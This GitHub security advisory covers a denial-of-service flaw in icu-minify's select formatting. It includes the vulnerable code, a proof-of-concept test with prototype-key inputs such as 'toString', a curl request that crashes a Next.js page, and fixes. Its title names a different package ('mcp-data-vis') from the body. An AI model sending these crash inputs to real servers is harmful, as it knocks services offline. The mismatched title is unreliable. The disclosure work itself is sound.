Skip to content

mcp-data-vis vulnerable to denial of service via unsanitized `select` key lookup on `Object.prototype` with `precompile: true`

Low severity GitHub Reviewed Published Apr 27, 2026 in amannn/next-intl • Updated May 6, 2026

Package

npm icu-minify (npm)

Affected versions

<= 4.9.1

Patched versions

4.9.2

Description

Summary

icu-minify's runtime formatter resolves select branches by looking up the runtime value as a plain property on a prototype-bearing object. When the value coerces to a key that exists on Object.prototype (e.g. toString, __proto__, constructor, hasOwnProperty, valueOf), the lookup returns a truthy value that short-circuits the ?? options.other fallback, and the downstream iterator crashes with TypeError: nodes is not iterable. Any consumer that forwards user input into a {arg, select, …} placeholder — a common idiom for role, status, type, gender — can be crashed per-request by supplying one of those keys. In Next.js SSR (via next-intl with experimental.messages.precompile) this yields a 500 for the affected render.

Details

Vulnerable code paths

Compilation produces a plain object whose prototype chain includes all Object.prototype members:

// packages/icu-minify/src/compile.tsx:191-199
function compileSelect(node: SelectElement): CompiledNode {
  const options: SelectOptions = {};            // <-- plain object, inherits from Object.prototype

  for (const [key, option] of Object.entries(node.options)) {
    options[key] = compileNodesToNode(option.value);
  }

  return [node.value, TYPE_SELECT, options];
}

At runtime, the formatter looks up the user-controllable value directly on that object:

// packages/icu-minify/src/format.tsx:226-244
function formatSelect<RichTextElement>(
  name: string,
  options: SelectOptions,
  locale: string,
  values: FormatValues<RichTextElement>,
  formatOptions: FormatOptions,
  pluralCtx: PluralContext | undefined
): string | RichTextElement | Array<string | RichTextElement> {
  const value = String(getValue(values, name));               // 234: coerce to string, no sanitization
  const branch: CompiledNode | undefined = options[value] ?? options.other; // 235: unsafe lookup

  if (process.env.NODE_ENV !== 'production' && !branch) {
    throw new Error(
      `No matching branch for select "${name}" with value "${value}"`
    );
  }

  return formatBranch(branch, locale, values, formatOptions, pluralCtx); // 243
}

Because options inherits from Object.prototype, lookups such as options['toString'] return Object.prototype.toString — a truthy Function. The ?? options.other fallback is therefore skipped, and the non-array, non-string branch is passed to formatBranch, which forwards it to formatNodes:

// packages/icu-minify/src/format.tsx:286-308
function formatBranch<RichTextElement>(
  branch: CompiledNode,
  /* … */
) {
  if (typeof branch === 'string') return branch;           // string: fine
  if (branch === TYPE_POUND) return formatNode(/* … */);    // pound: fine
  return formatNodes(branch as Array<CompiledNode>, /* … */); // 301: Function is not iterable
}

// packages/icu-minify/src/format.tsx:73-92
function formatNodes<RichTextElement>(
  nodes: Array<CompiledNode>,
  /* … */
): Array<string | RichTextElement> {
  const result: Array<string | RichTextElement> = [];
  for (const node of nodes) {                              // 82: TypeError: nodes is not iterable
    /* … */
  }
  return result;
}

Five bare-prototype keys reliably crash the formatter in production: toString, __proto__, constructor, hasOwnProperty, valueOf (plus propertyIsEnumerable, isPrototypeOf, toLocaleString). Note the development branch at line 237 (throw new Error('No matching branch for select …')) is bypassed because the inherited function is truthy — so this is not masked in development either.

Why formatPlural is not affected

formatPlural (format.tsx:246-284) looks safe for two independent reasons and does not need to be patched for this specific bug:

  1. Exact-match keys use the =${value} prefix (exactKey = '=' + value, line 263), so the attacker would need to supply e.g. =toString, which is not a member of Object.prototype.
  2. The category branch uses formatOptions.formatters.getPluralRules(locale, {type}).select(value) which returns a fixed enum (zero|one|two|few|many|other), never attacker-supplied.

The bug is specific to the select path where the raw string value is used as the lookup key.

Reachability

  • Direct consumers of icu-minify: any code calling format(compiled, locale, values, …) where values[arg] for a select placeholder comes from user input is vulnerable with no additional preconditions.
  • next-intl users who enable experimental.messages.precompile (packages/next-intl/src/plugin/types.tsx:24, wired in packages/next-intl/src/plugin/getNextConfig.tsx:177-293): the runtime at packages/use-intl/src/core/format-message/format-only.tsx forwards directly to icu-minify/format, so t('msg', {role: req.query.role}) against a {role, select, admin {…} other {…}} message crashes the render.

No middleware, type guard, escaping, or framework default stands between user input and the unsafe lookup — values reaches format() unmodified.

PoC

Verified dynamically against packages/icu-minify/src/format.tsx at commit b4aa538 (v4.9.1) with vitest and NODE_ENV=production.

Reproduction (drop into packages/icu-minify/test/poc.test.ts and run pnpm exec vitest run test/poc.test.ts):

import {describe, expect, it} from 'vitest';
import compile from '../src/compile.js';
import format, {type FormatOptions} from '../src/format.js';

const formatters: FormatOptions['formatters'] = {
  getDateTimeFormat: (...a) => new Intl.DateTimeFormat(...a),
  getNumberFormat:   (...a) => new Intl.NumberFormat(...a),
  getPluralRules:    (...a) => new Intl.PluralRules(...a)
};

describe('select prototype-key DoS', () => {
  const compiled = compile('{role, select, admin {Admin} user {User} other {Guest}}');

  for (const key of ['toString', '__proto__', 'constructor', 'hasOwnProperty', 'valueOf']) {
    it(`crashes on role="${key}"`, () => {
      process.env.NODE_ENV = 'production';
      expect(() => format(compiled, 'en', {role: key}, {formatters}))
        .toThrow(TypeError); // "nodes is not iterable"
    });
  }
});

Observed output (each of the 5 keys):

TypeError: nodes is not iterable
    at formatNodes (packages/icu-minify/src/format.tsx:82:22)
    at formatBranch (packages/icu-minify/src/format.tsx:301:10)
    at formatSelect (packages/icu-minify/src/format.tsx:243:10)
    at formatNode (packages/icu-minify/src/format.tsx:150:14)
    at formatNodes (packages/icu-minify/src/format.tsx:83:23)
    at format (packages/icu-minify/src/format.tsx:64:18)

End-to-end Next.js scenario (illustrative — any attacker-controlled role/status/type/gender forwarded into a select placeholder triggers the same exception inside the server render):

// app/[locale]/profile/page.tsx — assume precompile enabled
export default async function Page({searchParams}: {searchParams: Promise<{role?: string}>}) {
  const t = await getTranslations('Profile');
  const {role = 'other'} = await searchParams;
  return <h1>{t('greeting', {role})}</h1>;
  //                         ^^^^^ messages: { "greeting": "{role, select, admin {Hi admin} other {Hi}}" }
}
curl -i 'https://target.example/en/profile?role=toString'
HTTP/1.1 500 Internal Server Error

Impact

  • Availability: An unauthenticated attacker can force a 500 response on any page or API route that formats a select ICU message using user-controllable input. Each request fails independently; there is no persistent state corruption or amplification beyond the malicious request.
  • Confidentiality / Integrity: None. No data is leaked and no prototype write occurs — this is a prototype-chain read confusion, not a prototype pollution write.
  • Scope: Any consumer of icu-minify that passes user input into a select branch is vulnerable. next-intl users are only exposed if they have opted into the experimental experimental.messages.precompile flag.
  • Preconditions: Developer must forward untrusted input to a {arg, select, …} placeholder. This is a routine pattern (role, status, gender, type) and the library offers no documentation warning that select keys must be validated against prototype members.

Recommended Fix

Either of the following (defense-in-depth suggests both). Both are one-line, minimal-churn fixes.

  1. Use a null-prototype map in compileSelect (and symmetrically in compilePlural) so that no Object.prototype keys can ever be resolved:
// packages/icu-minify/src/compile.tsx
function compileSelect(node: SelectElement): CompiledNode {
-  const options: SelectOptions = {};
+  const options: SelectOptions = Object.create(null);

   for (const [key, option] of Object.entries(node.options)) {
     options[key] = compileNodesToNode(option.value);
   }

   return [node.value, TYPE_SELECT, options];
 }
  1. Gate the runtime lookup with Object.prototype.hasOwnProperty.call so the other fallback is reached for any non-own key:
// packages/icu-minify/src/format.tsx
 function formatSelect<RichTextElement>(/* … */) {
   const value = String(getValue(values, name));
-  const branch: CompiledNode | undefined = options[value] ?? options.other;
+  const branch: CompiledNode | undefined =
+    Object.prototype.hasOwnProperty.call(options, value) ? options[value] : options.other;
   /* … */
 }

Option 1 is preferable because it also survives future serialization round-trips (e.g. JSON-hydrated compiled messages) and removes the hazard at the source. Option 2 is a defensive backstop for any code path that constructs SelectOptions from arbitrary JSON at runtime.

No regression is expected in tests — compileSelect never reads back through the prototype chain, and all existing lookups use own properties.

References

@amannn amannn published to amannn/next-intl Apr 27, 2026
Published to the GitHub Advisory Database May 6, 2026
Reviewed May 6, 2026
Last updated May 6, 2026

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

EPSS score

Weaknesses

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-r27j-894h-3w3p

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.